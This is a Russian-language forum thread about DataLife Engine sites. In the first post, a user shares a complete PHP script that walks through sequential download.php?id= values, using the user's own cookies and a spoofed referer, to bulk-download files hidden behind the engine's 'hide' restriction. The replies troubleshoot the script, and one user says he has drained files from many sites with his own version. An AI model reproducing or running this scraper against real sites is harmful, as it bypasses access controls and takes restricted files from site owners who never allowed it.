Инфо Тырилка файлов из под хайда

Тема в разделе "DLE", создана пользователем WM-Kursor, 10 апр 2010.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 10.0 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. WM-Kursor

    WM-Kursor Создатель

    Регистр.:
    6 апр 2010
    Сообщения:
    17
    Симпатии:
    8
    Собственно:
    PHP:
    <?
    set_time_limit(0);
    //Powered by Kursor
    if ((!isset($_POST['template'])) and (!isset($_POST['cook']))){
    echo <<<HTML
    <FORM method="post">
        <P>
        Шаблон: <INPUT type="text" name="template">Например <b>http://prowebber.ru/engine/download.php?id=</b> <BR>
        Куки: <INPUT type="text" name="cook"><b>name=value; name=value; name=value;</b>... etc<BR>
            Начинать с id: <INPUT type="text" name="startid"><BR>
             Закончить id: <INPUT type="text" name="endid"><BR>
                      Referer: <INPUT type="text" name="referrer">Например <b>http://prowebber.ru/index.php</b><BR>
       <INPUT type="submit" value="Отправить">
        </P>
     </FORM>
    HTML;
    } else {
    $tpl=$_POST['template'];
    $cook=$_POST['cook'];
    $startid=$_POST['startid'];
    $endid=$_POST['endid'];
    $ref=$_POST['referrer'];
    function 
    getheader($url,$cookie,$referrer){
    $ch curl_init (); 
    curl_setopt ($ch CURLOPT_URL $url);
    curl_setopt ($ch CURLOPT_USERAGENT "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"); 
    curl_setopt ($ch CURLOPT_RETURNTRANSFER ); 
    curl_setopt($chCURLOPT_HEADER1);
    curl_setopt($chCURLOPT_NOBODY1);
    curl_setopt($chCURLOPT_FOLLOWLOCATION1);
    curl_setopt ($chCURLOPT_COOKIE$cookie);
    curl_setopt($chCURLOPT_REFERER$referrer); 
    $content curl_exec($ch); 
    curl_close($ch); 
    return(
    $content);
    }
    //качаем
    function download($url,$cookie,$referrer){
    $ch curl_init (); 
    curl_setopt ($ch CURLOPT_URL $url);
    curl_setopt ($ch CURLOPT_USERAGENT "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"); 
    curl_setopt ($ch CURLOPT_RETURNTRANSFER ); 
    curl_setopt($chCURLOPT_FOLLOWLOCATION1);
    curl_setopt ($chCURLOPT_COOKIE$cookie);
    curl_setopt($chCURLOPT_REFERER$referrer); 
    $content curl_exec($ch); 
    curl_close($ch); 
    return 
    $content;
    }
    //скачали
    //парсим имя файла
    function getfilename($head){
    preg_match("/filename=\"(.*)\"/i",$head,$output);
    return 
    $output;
    }
    //end парсилки
    for ( $i=$startid$i<=$endid$i++) {
    $zagolov=getheader($tpl.$i,$cook,$ref);
    $filename=getfilename($zagolov);
    //$filename[1] тут имя
    $cont=download($tpl.$i,$cook,$ref);
    $h=fopen($filename[1], 'w');
    fwrite($h,$cont);
    fclose($h);
    echo 
    'Id '.$i.' файл '.$filename[1]."<br>";
    }
    }
    ?>
    :)
     
    inventor69, antiterror и watson_ нравится это.
  2. bomb1980

    bomb1980

    Регистр.:
    24 апр 2008
    Сообщения:
    225
    Симпатии:
    56
    Просто класс! И как им пользоваться?, тут не все умные такие как вы!
     
  3. drawing4

    drawing4

    Регистр.:
    21 ноя 2008
    Сообщения:
    323
    Симпатии:
    37
    Я чего-то не могу въехать как она работает.

    Получается нужно иметь куки кого-нибудь у кого есть разрешение на то чтобы видеть хайд? Или как?
     
  4. WM-Kursor

    WM-Kursor Создатель

    Регистр.:
    6 апр 2010
    Сообщения:
    17
    Симпатии:
    8
    Своих кук достаточно. Просто нужно быть залогиненым и взять эти куки.
     
  5. raz0rke

    raz0rke Создатель

    Регистр.:
    30 июл 2009
    Сообщения:
    27
    Симпатии:
    6
    Он же работает с стандартным id? :D
    Код:
    download.php?id=x
     
  6. -=BlackSmoke=-

    -=BlackSmoke=-

    Регистр.:
    4 авг 2009
    Сообщения:
    281
    Симпатии:
    49
    Угу, со стандартным)
    Вот мой вариант, кстати:
     
    inventor69 нравится это.
  7. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.037

    -=BlackSmoke=- - запустил твоё детище некачает хотя определят имена файлов.
    куки какие прописывать, и в каком формате ? пробовал dle_onl_session, dle_hash, dle_password, PHPSESSID - чёта не скачивает нефига

    PHP:
    Warningfile_put_contents(./files/) [function.file-put-contents]: failed to open streamInvalid argument in Z:\home\dlehgrab\www\index.php on line 25
    Файл
    ошибка скачивания

    Warning
    file_put_contents(./files/gamebox_by_vano.rar) [function.file-put-contents]: failed to open streamNo such file or directory in Z:\home\dlehgrab\www\index.php on line 25
    Файл
    gamebox_by_vano.rar ошибка скачивания

    Warning
    file_put_contents(./files/dle_2008_saratov.ms.zip) [function.file-put-contents]: failed to open streamNo such file or directory in Z:\home\dlehgrab\www\index.php on line 25
    Файл
    dle_2008_saratov.ms.zip ошибка скачивания

    Warning
    file_put_contents(./files/trojan_desinged.rar) [function.file-put-contents]: failed to open streamNo such file or directory in Z:\home\dlehgrab\www\index.php on line 25
    Файл
    trojan_desinged.rar ошибка скачивания
     
  8. inventor69

    inventor69 Постоялец

    Регистр.:
    23 июн 2009
    Сообщения:
    148
    Симпатии:
    21
    Что то у меня твой вариант второй не пашет...
    А вот первый, хоть таблицу показал:))
    Я просто создал файл off.php и вставил туда код, который дали выше,потом залил себе в корневик хоста и запустил, вот что появилось:
    А что дальше делать?
     

    Вложения:

    • 1.JPG
      1.JPG
      Размер файла:
      25,1 КБ
      Просмотров:
      46
  9. raz0rke

    raz0rke Создатель

    Регистр.:
    30 июл 2009
    Сообщения:
    27
    Симпатии:
    6
    Не удачный пример :). Всеравно с сайта моего не вытянуть, разве что долгим перебором.
    Ну а так кто ставит хайда на сайт, он еще шифрует в мд5 линк.
     
  10. -=BlackSmoke=-

    -=BlackSmoke=-

    Регистр.:
    4 авг 2009
    Сообщения:
    281
    Симпатии:
    49
    o_nix, inventor69, странно, я им сливал дофига сайтов. Забыл сказать - надо в дире со скриптом создать папочку files.
     
    inventor69 и o_nix нравится это.
Статус темы:
Закрыта.